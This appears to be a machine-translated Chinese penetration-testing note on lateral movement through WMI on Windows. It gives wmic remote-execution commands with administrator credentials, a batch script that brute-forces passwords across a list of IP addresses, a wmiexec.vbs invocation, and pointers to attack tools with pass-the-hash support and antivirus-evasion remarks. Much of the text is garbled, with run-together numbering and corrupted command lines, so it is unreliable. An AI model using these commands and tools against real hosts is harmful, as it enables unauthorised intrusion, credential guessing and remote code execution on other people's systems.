.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
基于WMI的侧向运动
WMI简介
WMI的全名是Windows Management仪器。它出现在所有Windows操作系统中,并由一组强大的工具组成,用于管理本地或远程Windows系统。攻击者使用WMI攻击,但是Windows系统默认情况下不会在日志中记录这些操作。它可以是无木的。攻击脚本不需要写入磁盘,这会增加隐藏。建议使用WMIC远程执行命令。
WMI利用条件
远程服务器启动Windows Management Instrumentation服务(默认为ON)
端口135未过滤[如果在默认配置下启用了目标主机防火墙,则不会连接防火墙]
连接失败常见错误编号:
1234567891111213141516171819202121。允许共享异常错误:代码=0x800706BA描述=RPC服务器不可用。设备=Win322。错误:当组策略封锁indurandIvestraotr远程访问=0x80070005描述=访问被拒绝。设备=Win323.IP安全策略块135错误:代码=0x800706BA描述=RPC服务器不可用。设备=Win324。错误:禁用Winmgmt Service=0x80070422描述=无法启动服务时代码,因为它可能被禁用或与之关联的设备未启动。设备=Win325。 Wbem directory permission is denied, wmic cannot be used.
使用WMIC进行水平运动
通用系统带有命令
123456781. List remote host process wmic /node:192.168.1.1 /user:192.168.1.1\administrator /password:00!@#123QWE process list brief2.执行BAT脚本WMIC /NODE:192.168.1 /user:192.168.1.1.1 \administrator /passwork:0!@#123QWe Process Calles CALTER CALLE CALLE CALCE CALES CARTE CREATE C: \ PROGRAMDATA \ PROGRAMDATA \ TEST.BAT33。在远程系统WMIC /NODE:192.168.1 /user:192.168.1.1.1 \administrator /password:0上执行单个命令https://www.cnblogs.com/0xdd/p/11393392.html
批处理爆炸
练习后,WMI的爆炸将有3个以上的错误。 360将拦截[没有软杀时,没有测试],日志是远程RDP爆炸,WMI的连接将受到临时限制。
※以下是一个密码爆炸。如果需要爆炸多个密码爆炸,则可以根据IPC侧面的文章水平移动它来对其进行修改。
点点:请注意特殊字符,例如密码中的%需要使用%示例:123#$%应该转换为123#$ %%
1234567891011@echo ofcho offclsecho useage:%0 ip.txtfor /f %% i in(%1)do(echo wmic /node: %% i /user:'%% i \ indersantor' /user:'%% i \管理员' /password:'123456'进程列表简短2nulif errorLevel==0(echo Success: %% i pic.txt)echo end.txt End.txt
使用工具
-1
wmiexec.vbs
Impacket-wmiexec
尚未测试
wmiexec.vbs是一种开发的工具,旨在解决WMIC无法回声命令的工具。原理是首先将数据保存在临时文件中,并在每次读取执行结果后自动删除数据。它可用于回声“执行命令”的结果并获得“半相互作用壳”。
1cscript wmiexec.vbs /cmd 192.168.1.1管理员测试@123 Whoami
SharpWmi
优点:支持PTH
缺点:它需要调用WMI服务,占据目标的445、135和另一个随机端口。
使用参考:域渗透——通过哈希实现(3Gstudent.github.io)
SharpWmi(修改版本)
这是一种基于端口135水平移动的工具。它具有执行命令和上传文件的功能。它通过WMI执行命令,并通过呼叫传输数据。
优点:仅依靠端口135,而不依靠港口139和港口445
缺点:当前,仅支持将文件上传到512kb以下,因为重置每个值的长度不能超过512kb。执行命令和上传文件都取决于PowerShell(由360拦截)https://github.com/qax-a-team/sharpwmi
Wmihacker(推荐)
https://github.com/idiotc4t/sharpwmi
这是一种基于端口135的水平移动的工具。它具有执行命令和上传文件的功能。它通过WMI执行命令,并通过注册表传输数据。
拉登
水平穿透的远程命令执行是创建服务或调用win32_process.create excution命令。这些方法已被SWSW.CKER水平运动测试工具100%截获。 (仅依靠端口135,不依靠端口139和港口445)
重要:支持PTH-https://github.com/360-linton-lab/wmihacker/issues/1
主函数:1。命令执行; 2。文件上传; 3。文件下载
https://github.com/360-linton-lab/wmihacker
Sharp-Wmiexec
模块功能
目标端口
目标系统
用法教程
WMI爆炸
港口135
视窗
http://K8GE.org/ladon/wmiscan.html
WMI-NTLMHASH爆炸
港口135
视窗
http://k8ge.org/ladon/wmihashscan.html
Wmiexec(推荐)
港口135
视窗
仅端口135在注册表中回荡,侵袭者或其他也依赖445的工具,并且不依赖PowerShell,适合任何目标
Wmiexec2
港口135
视窗
像Wmiexec一样,通过注册表回声仅需要端口135,但是依靠PowerShell,没有PowerShell的目标可能不适用。
WMICMD
未使用,尚未测试
https://github.com/checkymander/sharp-wmiexec
010-1010未使用,尚未测试
https://github.com/nccgroup/wmicmd